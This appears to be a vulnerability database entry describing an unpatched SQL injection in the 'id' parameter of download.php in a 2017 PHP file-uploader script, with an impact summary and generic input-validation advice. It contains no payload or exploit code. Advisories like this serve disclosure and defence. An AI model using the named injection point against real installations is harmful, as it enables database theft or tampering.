vendor:
MySQL File and Image Uploader and Sharing Blob File Server
by:
Ihsan Sencan
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MySQL File and Image Uploader and Sharing Blob File Server
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:nelliwinne:mysql_file_and_image_uploader_and_sharing_blob_file_server
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017
MySQL Blob Uploader – File Upload to Database PHP Script v1.0 – SQL Injection
An attacker can exploit a SQL injection vulnerability in the MySQL Blob Uploader - File Upload to Database PHP Script v1.0 to gain access to the database. The vulnerability exists in the download.php file, which allows an attacker to inject malicious SQL code into the 'id' parameter. This can be exploited to gain access to the database, allowing the attacker to view, modify, or delete data.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
